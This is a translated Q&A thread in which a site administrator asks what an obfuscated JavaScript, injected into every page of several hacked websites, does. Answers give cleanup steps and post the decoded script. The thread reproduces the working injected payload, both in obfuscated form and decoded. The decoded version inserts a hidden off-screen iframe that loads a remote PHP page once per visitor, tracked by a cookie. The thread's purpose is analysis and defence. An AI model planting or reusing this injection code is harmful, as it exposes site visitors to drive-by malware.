0

我管理的许多网站已被黑客入侵,并且每个页面中都插入了以下 javascript 代码。我不知道如何解码它或它甚至做了什么,所以我不知道它有多严重。任何人都可以帮忙吗?

<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>

我假设这些是字符引用,它实际上指向某个包含恶意内容的站点,但我不知道如何解决。我正在经历并删除所有这些并更改所有密码以防止进一步的安全问题,但对此的任何建议将不胜感激!

谢谢。

4

3 回答 3

2

根据我的经验,此类攻击发生在共享托管服务器上,其中自动机器人已经猜到了帐户的密码,或者帐户持有人的桌面上有恶意软件已经捕获了凭据并正在滥用它们。

你最好的选择?接受肯定会对您的用户产生影响,然后进行尽职调查:

  • 如果您不是所有者,请通知您的共享主机。
  • 归档共享主机帐户的整个主目录,并包含该用户的 cron 作业、数据库、电子邮件和其他信息的内容。(例如。tar -czf website-$(date +%F).tar.gz ~/或您的共享主机备份实用程序。)
  • 检查可能正在运行的任何恶意进程或脚本。ps gaux是你的朋友。
  • 核对共享主机帐户中的所有内容。
  • 无论如何都要更改每个密码,即使您认为它不可能受到影响。
  • 重新创建帐户并为您的用户保留可用的维护页面。您应该备份您的帐户。
  • 在虚拟机中解压缩备份并调查包括日志和其他信息在内的所有内容,以了解攻击是如何发生的。将您学到的知识应用到您的网站代码中。
  • 考虑到您在上一步中发现的原因,使用修复程序重新部署您的代码;如果您的帐户使用的是 Joomla、Drupal、Wordpress 或类似的框架,请花点时间升级到最新版本。

不要跳过步骤,否则再次发生这种情况。

于 2013-08-30T18:26:28.160 回答
1

这就是注入的东西。要破译这一点,您可以执行与您帖子中的 javascript 相同的操作。将字符串拆分为逗号上的十六进制字符串,然后 parseInt 以 16 为底,减去 22,然后查找该字符代码的字符。我不确定它是如何被恶意使用的。有人有想法么?

function v09() {

    var static = 'ajax';

    var controller = 'index.php';

    var v = document.createElement('iframe');

    v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';

    v.style.position = 'absolute';

    v.style.color = '968';

    v.style.height = '968px';

    v.style.width = '968px';

    v.style.left = '1000968';

    v.style.top = '1000968';

    if (!document.getElementById('v')) {

        document.write('<p id=\'v\' class=\'v09\' ></p>');

        document.getElementById('v').appendChild(v);

    }

}

function SetCookie(cookieName, cookieValue, nDays, path) {

    var today = new Date();

    var expire = new Date();

    if (nDays == null || nDays == 0)

        nDays = 1;

    expire.setTime(today.getTime() + 3600000 * 24 * nDays);

    document.cookie = cookieName + "=" + escape(cookieValue)

    + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie(name) {

    var start = document.cookie.indexOf(name + "=");

    var len = start + name.length + 1;

    if ((!start) &&

    (name != document.cookie.substring(0, name.length)))

    {

        return null;

    }

    if (start == -1)

        return null;

    var end = document.cookie.indexOf(";", len);

    if (end == -1)

        end = document.cookie.length;

    return unescape(document.cookie.substring(len, end));

}

if (navigator.cookieEnabled)

{

    if (GetCookie('visited_uq') == 55) {

    } else {

        SetCookie('visited_uq', '55', '1', '/');

        v09();

    }

}
于 2013-08-30T18:45:04.863 回答
0

这种事情也发生在我身上,我没有使用共享主机解决方案,我使用的是专用服务器,没有任何 FTP 或 SSH 或 SCP 活动的证据。

我意识到有人使用我的一种形式进行代码注入(我的网站是 PHP)。这可以通过使用您自己的代码来实现,方法是向文本框或文本字段提供输入,这些输入将由您服务器上的某些代码解释。

例如,您可能有一个小表单,允许人们将文件上传到某种目录中。有人可以上传一个代码文件然后执行它,这个代码文件可能是用来将 javascript 代码注入您自己的代码页的罪魁祸首。

使用此实例,可以限制允许上传的文件类型,将文件放在浏览器无法直接访问的目录中,或者确保文件在上传时没有执行权限。

您还可以确保对输入进行清理,以免恶意文本在您的任何表单中都有效。

于 2013-09-10T20:57:02.290 回答